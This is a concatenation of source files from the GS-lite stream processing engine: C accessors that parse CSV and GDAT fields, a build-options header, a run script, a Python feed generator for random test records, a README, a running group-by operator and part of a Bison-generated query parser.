		value = value * 10 + (unsigned long)(str[i] - '0');
	return value;
}
// Parse an unsigned decimal integer from a non-NUL-terminated field of
// `len` digit characters.  Handles up to 20 digits (full 64-bit
// range); returns 0 for len==0 or len>20, like the original switch's
// default case.  Horner accumulation in unsigned 64-bit arithmetic is
// value-for-value identical to the unrolled digit*power sum.
static inline __attribute__((always_inline)) unsigned long long gs_strtoull (const char *str, size_t len) {
	unsigned long long value = 0;
	size_t i;
	if (len == 0 || len > 20)
		return 0;
	for (i = 0; i < len; i++)
		value = value * 10 + (unsigned long long)(str[i] - '0');
	return value;
}
// Parse a signed decimal integer (optional leading '-', up to 10
// digits) from a non-NUL-terminated field.  Delegates magnitude
// parsing to gs_strtoul.  Note str[0] is read even when len is 0,
// as in the original.
static inline __attribute__((always_inline)) long gs_strtol (const char *str, size_t len) {
	if (str[0] != '-')
		return (long)gs_strtoul(str, len);
	return -((long)gs_strtoul(str + 1, len - 1));
}
// Parse a signed decimal integer (optional leading '-', up to 20
// digits) from a non-NUL-terminated field.
// Fix: the return type was declared `long` even though the value is
// computed in `long long`; on ILP32 builds (long == 32 bits) 64-bit
// results were silently truncated.  Widened to `long long`, which is
// what callers such as get_csv_llong (gs_int64_t) expect; on LP64
// platforms this is bit-identical to the old behavior.
static inline __attribute__((always_inline)) long long gs_strtoll (const char *str, size_t len) {
	long long sign = 1;
	if (str[0] == '-') {
		sign = -1;
		++str;
		--len;
	}
	return sign * gs_strtoull(str, len);
}
/* CSV access function using position as 3rd argument */
// Parse a CSV field holding a fractional UNIX timestamp into whole
// seconds by reading at most the first 10 characters as an unsigned
// integer.  NOTE(review): this only drops the fractional part cleanly
// when the integer part is exactly 10 digits (current-era epoch
// seconds); shorter integer parts would pull in the '.' — confirm the
// feeds always send 10-digit epochs.
static inline gs_retval_t get_csv_float_to_timestamp(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
//	*t = strtoul((const char*)p->record.csv.fields[pos-1], NULL, 10);
	*t = gs_strtoul((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]<10 ? p->record.csv.field_lens[pos-1] : 10);
	return 0;
}
// Parse a CSV field as an unsigned 32-bit decimal (1-based `pos`).
static inline gs_retval_t get_csv_uint(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
//	*t = strtoul((const char*)p->record.csv.fields[pos-1], NULL, 10);
	*t = gs_strtoul((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
	return 0;
}
// Parse a CSV field as an unsigned 64-bit decimal (1-based `pos`).
static inline gs_retval_t get_csv_ullong(struct packet * p, gs_uint64_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
//	*t = strtoull((const char*)p->record.csv.fields[pos-1], NULL, 10);
	*t = gs_strtoull((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
	return 0;
}
// Parse a dotted-quad IPv4 CSV field into host-order form
// (a<<24 | b<<16 | c<<8 | d).  Returns 0 (or -1 under sanity checks).
static inline gs_retval_t get_csv_ip(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	// parsed data is not NUL-terminated; we can terminate it in place to
	// use standard C functions.  The last field must be copied first,
	// since terminating it in place could write past the record buffer.
	gs_int8_t buffer[256];
	gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
	gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
	if (pos == p->record.csv.numberfields) {
		// Fix: clamp the copy so an oversized last field cannot
		// overflow the fixed 256-byte stack buffer.
		if (data_len >= sizeof(buffer))
			data_len = sizeof(buffer) - 1;
		memcpy(buffer, data, data_len);
		data = buffer;
	}
	data[data_len] = '\0';
	// Fix: initialize so a malformed field yields 0.0.0.0 instead of
	// reading indeterminate values when sscanf matches fewer than 4.
	unsigned ip1=0,ip2=0,ip3=0,ip4=0;
	sscanf((const char*)data,"%u.%u.%u.%u",&ip1,&ip2,&ip3,&ip4);
	*t=(ip1<<24)|(ip2<<16)|(ip3<<8)|ip4;
	return 0;
}
// Parse a colon-separated IPv6 CSV field (eight 16-bit hex groups;
// zero-compression "::" is not expanded here) into four network-order
// 32-bit words.  Returns 0 (or -1 under sanity checks).
static inline gs_retval_t get_csv_ipv6(struct packet * p, struct ipv6_str * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	// parsed data is not NUL-terminated; we can terminate it in place to
	// use standard C functions.  The last field must be copied first,
	// since terminating it in place could write past the record buffer.
	gs_int8_t buffer[256];
	gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
	gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
	if (pos == p->record.csv.numberfields) {
		// Fix: clamp the copy so an oversized last field cannot
		// overflow the fixed 256-byte stack buffer.
		if (data_len >= sizeof(buffer))
			data_len = sizeof(buffer) - 1;
		memcpy(buffer, data, data_len);
		data = buffer;
	}
	data[data_len] = '\0';
	// Fix: zero-initialize so groups sscanf fails to match read as 0
	// instead of indeterminate stack values.
	gs_uint32_t v[8] = {0,0,0,0,0,0,0,0};
	sscanf((const char*)data,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
	t->v[0]=htonl(v[0]<<16|v[1]);
	t->v[1]=htonl(v[2]<<16|v[3]);
	t->v[2]=htonl(v[4]<<16|v[5]);
	t->v[3]=htonl(v[6]<<16|v[7]);
	return 0;
}
// Return a non-owning view (pointer + length) of a CSV field; no copy
// is made, so the result is only valid while the packet is.
static inline gs_retval_t get_csv_string(struct packet * p, struct gs_string * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	t->data=(gs_sp_t)p->record.csv.fields[pos-1];
	t->length=p->record.csv.field_lens[pos-1];
	t->owner=0;	// caller must not free; packet owns the bytes
	return 0;
}
// Parse a CSV boolean: exactly the 4-character case-insensitive token
// "TRUE" yields 1; anything else yields 0.
static inline gs_retval_t get_csv_bool(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	*t=0;
	if ((p->record.csv.field_lens[pos-1]==4) &&
		(strncasecmp("TRUE",(const char*)p->record.csv.fields[pos-1],4) ==0) ) {
		*t=1;
	}
	return 0;
}
// Parse a CSV field as a signed 32-bit decimal (optional leading '-').
static inline gs_retval_t get_csv_int(struct packet * p, gs_int32_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	//*t = strtol((const char*)p->record.csv.fields[pos-1], NULL, 10);
	*t = gs_strtol((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
	return 0;
}
// Parse a CSV field as a signed 64-bit decimal (optional leading '-').
static inline gs_retval_t get_csv_llong(struct packet * p, gs_int64_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	//*t = strtoll((const char*)p->record.csv.fields[pos-1], NULL, 10);
	*t = gs_strtoll((const char*)p->record.csv.fields[pos-1], p->record.csv.field_lens[pos-1]);
	return 0;
}
// Parse a CSV field as a double via strtod.  Returns 0 (or -1 under
// sanity checks).
static inline gs_retval_t get_csv_float(struct packet * p, gs_float_t * t,gs_uint32_t pos)
{
#ifdef PARSER_SANITY_CHECKS
	if (p->ptype != PTYPE_CSV) return -1;
	if (p->record.csv.numberfields < pos) return -1;
#endif
	// parsed data is not NUL-terminated; we can terminate it in place to
	// use standard C functions.  The last field must be copied first,
	// since terminating it in place could write past the record buffer.
	gs_int8_t buffer[256];
	gs_sp_t data=(gs_sp_t)p->record.csv.fields[pos-1];
	gs_uint32_t data_len = p->record.csv.field_lens[pos-1];
	if (pos == p->record.csv.numberfields) {
		// Fix: clamp the copy so an oversized last field cannot
		// overflow the fixed 256-byte stack buffer.
		if (data_len >= sizeof(buffer))
			data_len = sizeof(buffer) - 1;
		memcpy(buffer, data, data_len);
		data = buffer;
	}
	data[data_len] = '\0';
	*t = strtod((const char*)data, NULL);
	return 0;
}
#include <lfta/csv_macro.h>
/* GDAT access function using position as 3rd argument */
//#define GDATDEBUG
// GDAT accessors: each one validates the packet type and 1-based field
// position, decodes the field through the schema parser
// (ftaschema_get_field_by_index), checks the declared field type, and
// copies the value out.  All return 0 on success and -1 on any
// mismatch.  The GDATDEBUG fprintfs trace progress when that macro is
// defined at build time.
static inline gs_retval_t get_gdat_uint(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode uint");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=UINT_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.ui;
	return 0;
}
// Unsigned 64-bit field accessor.
static inline gs_retval_t get_gdat_ullong(struct packet * p, gs_uint64_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode ullong");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=ULLONG_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.ul;
	return 0;
}
// IPv4 field accessor (note: the type check precedes the first debug
// print in this and the ipv6 variant, unlike the others).
static inline gs_retval_t get_gdat_ip(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
	struct access_result ar;
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode ip");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=IP_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.ui;
	return 0;
}
// IPv6 field accessor: copies the four 32-bit words of the address.
static inline gs_retval_t get_gdat_ipv6(struct packet * p, struct ipv6_str * t,gs_uint32_t pos)
{
	struct access_result ar;
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode ipv6");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=IPV6_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	t->v[0]=ar.r.ip6.v[0];
	t->v[1]=ar.r.ip6.v[1];
	t->v[2]=ar.r.ip6.v[2];
	t->v[3]=ar.r.ip6.v[3];
	return 0;
}
// Variable-length string field accessor.  NOTE(review): the vstring
// `offset` is cast directly to a pointer here — presumably the schema
// parser has already resolved it against the record base; confirm
// before relying on it outside this path.
static inline gs_retval_t get_gdat_string(struct packet * p, struct gs_string * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode string");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=VSTR_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	t->data=(gs_sp_t)ar.r.vs.offset;
	t->length=ar.r.vs.length;
	return 0;
}
// Boolean field accessor (stored as an unsigned int).
static inline gs_retval_t get_gdat_bool(struct packet * p, gs_uint32_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode bool");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=BOOL_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.ui;
	return 0;
}
// Signed 32-bit field accessor.
static inline gs_retval_t get_gdat_int(struct packet * p, gs_int32_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode int");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=INT_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.i;
	return 0;
}
// Signed 64-bit field accessor.
static inline gs_retval_t get_gdat_llong(struct packet * p, gs_int64_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode llong");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=LLONG_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.l;
	return 0;
}
// Floating-point field accessor.
static inline gs_retval_t get_gdat_float(struct packet * p, gs_float_t * t,gs_uint32_t pos)
{
	struct access_result ar;
#ifdef GDATDEBUG
	fprintf(stderr,"Decode float");
#endif
	if (p->ptype != PTYPE_GDAT) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (p->record.gdat.numfields<pos) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	ar=ftaschema_get_field_by_index(p->record.gdat.schema,pos-1,p->record.gdat.data,p->record.gdat.datasz);
#ifdef GDATDEBUG
	fprintf(stderr,".");
#endif
	if (ar.field_data_type!=FLOAT_TYPE) return -1;
#ifdef GDATDEBUG
	fprintf(stderr,"DONE\n");
#endif
	*t=ar.r.f;
	return 0;
}
#include <lfta/gdat_macro.h>
// External functions
#ifdef __cplusplus
}
#endif
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef GSOPTIONS
#define GSOPTIONS
// Controls which optional capabilities will be built into runtime
// (comment/uncomment a define and rebuild to toggle the feature).
// support for interfaces with google protobuf streams
#define PROTO_ENABLED
// support BSA stream interfaces
//#define BSA_ENABLED
// support for KAFKA interfaces
//#define KAFKA_ENABLED
// support for SSL decryption
//#define SSL_ENABLED
// support RMR streams
#define RMR_ENABLED
#endif
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
sleep 10
python ./gen_feed.py &
../../bin/gsprintconsole `cat gshub.log` default example &
sleep 10
../../bin/start_processing
<file_sep>import random
import time
ipv4s = ["1.2.3.4", "3.4.5.6", "172.16.17.32", "192.168.127.12"]
ipv6s = ["fc00:db20:35b:7399::5",
"fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
"fdf8:f53e:61e4::18",
"fc00:db20:35b:7399::5" ]
strings = ["foo", "bar", "zed", "flip", "flood"]
bools = ["TRUE", "FALSE"]
tstart = int(time.time())
tend = tstart+50
rec_per_ts = 5
for ts in xrange(tstart, tend+1):
for rno in xrange(0, rec_per_ts):
v2 = str(random.randint(1,100000))
v3 = ipv4s[random.randrange(0,len(ipv4s))]
v4 = ipv6s[random.randrange(0,len(ipv6s))]
v5 = strings[random.randrange(0,len(strings))]
v6 = bools[random.randrange(0,len(bools))]
v7 = str(random.randint(1,100000))
v8 = str(random.randint(1,100000))
v9 = str(random.uniform(1,100000))
rec = [str(ts), v2, v3, v4, v5, v6, v7, v8, v9]
print ",".join(rec)
<file_sep>.. This work is licensed under a Creative Commons Attribution 4.0 International License.
.. SPDX-License-Identifier: CC-BY-4.0
GS-lite Stream Processing Engine Overview
==========================================
GS-lite is an open-source, real-time, low-latency, high-throughput stream processing engine.
It is a fork of cask/tigon (https://github.com/cdapio/tigon) maintained to serve the needs of RIC applications (currently MC xApp).
The original github repository is no longer maintained by the original maintainers.
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef RWGROUPBY_OPERATOR_H
#define RWGROUPBY_OPERATOR_H
#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"
#define _GB_FLUSH_PER_TUPLE_ 1
using namespace std;
// Running (non-windowed flush-on-advance) group-by aggregation
// operator.  The groupby_func policy extracts group keys, maintains
// aggregates, and decides when temporal flushes are due; results are
// accumulated in a hash table keyed by group.
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class running_agg_operator : public base_operator {
private :
	groupby_func func;	// query-specific grouping/aggregation policy
	hash_table<group, aggregate, hasher_func, equal_func> group_table;	// open groups
	typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;	// resume point for flushing
	gs_int32_t nflushes;	// windows to flush, as reported by func.flush_needed()
public:
	running_agg_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
		flush_pos = group_table.end();
	}
	// Process one input tuple: flush completed windows if the policy
	// says time advanced, then fold the tuple into its group's
	// aggregate (creating the group on first sight).  Output tuples,
	// if any, are appended to `result`.  Always returns 0.
	virtual int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
		// Push out completed groups
		group grp, *ret;
		ret = func.create_group(tup, (gs_sp_t)&grp);
		nflushes = func.flush_needed();
		if(func.disordered()){
			// out-of-order input is dropped silently
			// fprintf(stderr,"Out of order record in %s\n",op_name);
			return 0;
		}
		if (! ret) {
			// not a data tuple for grouping: still honor pending
			// flushes and forward any temporal status punctuation
			if (nflushes>0){
				flush(result);
			}
			if (func.temp_status_received()) {
				host_tuple temp_tup;
				if (!func.create_temp_status_tuple(temp_tup, true)) {
					temp_tup.channel = output_channel;
					result.push_back(temp_tup);
				}
			}
			tup.free_tuple();
			return 0;
		}
		if (nflushes>0) {
			flush(result);
		}
		typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
		if ((iter = group_table.find(grp)) != group_table.end()) {
			// existing group: fold the tuple in
			func.update_aggregate(tup, grp, (*iter).second);
		}else{
			char aggr_buffer[sizeof(aggregate)];
			// create an aggregate in preallocated buffer
			func.create_aggregate(tup, aggr_buffer);
			// needs an operator= doing a deep copy
			group_table.insert(grp, (*(aggregate*)aggr_buffer));
		}
		tup.free_tuple();
		return 0;
	}
virtual int flush(list<host_tuple>& result) {
host_tuple tup;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
// Limit the number of successive flushes - avoid explosive behavior
const gs_int32_t max_flushes = 25;
if(nflushes>max_flushes){
fprintf(stderr,"Warning in operator %s, temporal advance of %d windows needed, max number of windows that can be reported at once is %d\n",op_name, nflushes, max_flushes);
nflushes = max_flushes;
}
for(gs_int32_t flush_no = 0; flush_no < nflushes; ++flush_no){
// advance the TB for the reinit
if(flush_no < nflushes-1){
func.advance_last_tb();
}else{
func.reset_last_tb(); // Move to current tb in case flush limit reached
}
// If the old table isn't empty, flush it now.
for (flush_pos = group_table.begin(); flush_pos != group_table.end(); ) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
if(func.cleaning_when((*flush_pos).first,(*flush_pos).second)){
group &g = (*flush_pos).first;
//aggregate a = (*flush_pos).second;
++flush_pos;
group_table.erase(g);
}else{
func.reinit_aggregates((*flush_pos).first, (*flush_pos).second);
++flush_pos;
}
}
}
return 0;
}
virtual int set_param_block(int sz, void * value) {
func.set_param_block(sz, value);
return 0;
}
virtual int get_temp_status(host_tuple& result) {
result.channel = output_channel;
return func.create_temp_status_tuple(result, true);
}
virtual int get_blocked_status () {
return -1;
}
unsigned int get_mem_footprint() {
return group_table.get_mem_footprint();
}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* A Bison parser, made by GNU Bison 3.0.4. */
/* Bison implementation for Yacc-like parsers in C
Copyright (C) 1984, 1989-1990, 2000-2015 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
/* As a special exception, you may create a larger work that contains
part or all of the Bison parser skeleton and distribute that work
under terms of your choice, so long as that work isn't itself a
parser generator using the skeleton or a modified version thereof
as a parser skeleton. Alternatively, if you modify or redistribute
the parser skeleton itself, you may (at your option) remove this
special exception, which will cause the skeleton and the resulting
Bison output files to be licensed under the GNU General Public
License without this special exception.
This special exception was added by the Free Software Foundation in
version 2.2 of Bison. */
/* C LALR(1) parser skeleton written by <NAME>, by
simplifying the original so-called "semantic" parser. */
/* All symbols defined below should begin with yy or YY, to avoid
infringing on user name space. This should be done even for local
variables, as they might otherwise be expanded by user macros.
There are some unavoidable exceptions within include files to
define necessary library symbols; they are noted "INFRINGES ON
USER NAME SPACE" below. */
/* Identify Bison output. */
#define YYBISON 1
/* Bison version. */
#define YYBISON_VERSION "3.0.4"
/* Skeleton name. */
#define YYSKELETON_NAME "yacc.c"
/* Pure parsers. */
#define YYPURE 0
/* Push parsers. */
#define YYPUSH 0
/* Pull parsers. */
#define YYPULL 1
/* Substitute the variable and function names. */
#define yyparse FtaParserparse
#define yylex FtaParserlex
#define yyerror FtaParsererror
#define yydebug FtaParserdebug
#define yynerrs FtaParsernerrs
#define yylval FtaParserlval
#define yychar FtaParserchar
/* Copy the first part of user declarations. */
#line 23 "fta.y" /* yacc.c:339 */
#include <stdio.h>
/* Some addn'l includes, necessary but not included by the
bison generated code.
*/
#include <stdlib.h>
/* prototypes for the parser callbacks.
*/
#include "parse_fta.h"
#include "parse_schema.h"
extern fta_parse_t *fta_parse_result;
extern var_defs_t *fta_parse_defines;
#define YYDEBUG 1
#line 100 "fta.tab.cc" /* yacc.c:339 */
# ifndef YY_NULLPTR
# if defined __cplusplus && 201103L <= __cplusplus
# define YY_NULLPTR nullptr
# else
# define YY_NULLPTR 0
# endif
# endif
/* Enabling verbose error messages. */
#ifdef YYERROR_VERBOSE
# undef YYERROR_VERBOSE
# define YYERROR_VERBOSE 1
#else
# define YYERROR_VERBOSE 0
#endif
/* In a future release of Bison, this section will be replaced
by #include "fta.tab.cc.h". */
#ifndef YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
# define YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
/* Debug traces. */
#ifndef YYDEBUG
# define YYDEBUG 0
#endif
#if YYDEBUG
extern int FtaParserdebug;
#endif
/* Token type. */
#ifndef YYTOKENTYPE
# define YYTOKENTYPE
enum yytokentype
{
NAME = 258,
STRING_TOKEN = 259,
INTNUM = 260,
LONGINTNUM = 261,
APPROXNUM = 262,
OR = 263,
AND = 264,
NOT = 265,
COMPARISON = 266,
SHIFT_OP = 267,
UMINUS = 268,
SEMICOLON = 269,
LEFTBRACE = 270,
RIGHTBRACE = 271,
BY = 272,
AS = 273,
AGGR = 274,
FROM = 275,
INNER_JOIN = 276,
FILTER_JOIN = 277,
OUTER_JOIN = 278,
LEFT_OUTER_JOIN = 279,
RIGHT_OUTER_JOIN = 280,
WATCHLIST_JOIN = 281,
GROUP = 282,
HAVING = 283,
IN = 284,
SELECT = 285,
WATCHLIST = 286,
WHERE = 287,
SUPERGROUP = 288,
CLEANING_WHEN = 289,
CLEANING_BY = 290,
CLOSING_WHEN = 291,
SUCH = 292,
THAT = 293,
CUBE = 294,
ROLLUP = 295,
GROUPING_SETS = 296,
TRUE_V = 297,
FALSE_V = 298,
TIMEVAL_L = 299,
HEX_L = 300,
LHEX_L = 301,
IP_L = 302,
IPV6_L = 303,
MERGE = 304,
SLACK = 305,
DEFINE_SEC = 306,
PARAM_SEC = 307,
PROTOCOL = 308,
TABLE = 309,
STREAM = 310,
FTA = 311,
UNPACK_FCNS = 312,
OPERATOR = 313,
OPERATOR_VIEW = 314,
FIELDS = 315,
SUBQUERIES = 316,
SELECTION_PUSHDOWN = 317
};
#endif
/* Value type. */
#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
union YYSTYPE
{
#line 52 "fta.y" /* yacc.c:355 */
int intval;
double floatval;
char *strval;
int subtok;
string_t *stringval;
/* for FTA definition. */
literal_t *litval;
scalarexp_t *scalarval;
se_list_t *se_listval;
select_list_t *select_listval;
table_exp_t *tblp;
predicate_t *predp;
literal_list_t *lit_l;
tablevar_t *table;
tablevar_list_t *tbl_list;
colref_t *colref;
ifpref_t *ifpref;
colref_list_t *clist;
var_defs_t *var_defs;
var_pair_t *var_pair;
gb_t *gb_val;
gb_list_t *gb_list;
list_of_gb_list_t *list_of_gb_list;
extended_gb_t *extended_gb;
extended_gb_list_t *extended_gb_list;
query_list_t *q_list;
/* For table definition */
field_entry *field_t;
field_entry_list *field_list_t;
table_def *table_def_t;
table_list *table_list_schema;
param_list *plist_t;
name_vec *namevec_t;
subquery_spec *subq_spec_t;
subqueryspec_list *subqueryspec_list_t;
unpack_fcn *ufcn;
unpack_fcn_list *ufcnl;
#line 248 "fta.tab.cc" /* yacc.c:355 */
};
typedef union YYSTYPE YYSTYPE;
# define YYSTYPE_IS_TRIVIAL 1
# define YYSTYPE_IS_DECLARED 1
#endif
extern YYSTYPE FtaParserlval;
int FtaParserparse (void);
#endif /* !YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED */
/* Copy the second part of user declarations. */
#line 265 "fta.tab.cc" /* yacc.c:358 */
#ifdef short
# undef short
#endif
#ifdef YYTYPE_UINT8
typedef YYTYPE_UINT8 yytype_uint8;
#else
typedef unsigned char yytype_uint8;
#endif
#ifdef YYTYPE_INT8
typedef YYTYPE_INT8 yytype_int8;
#else
typedef signed char yytype_int8;
#endif
#ifdef YYTYPE_UINT16
typedef YYTYPE_UINT16 yytype_uint16;
#else
typedef unsigned short int yytype_uint16;
#endif
#ifdef YYTYPE_INT16
typedef YYTYPE_INT16 yytype_int16;
#else
typedef short int yytype_int16;
#endif
#ifndef YYSIZE_T
# ifdef __SIZE_TYPE__
# define YYSIZE_T __SIZE_TYPE__
# elif defined size_t
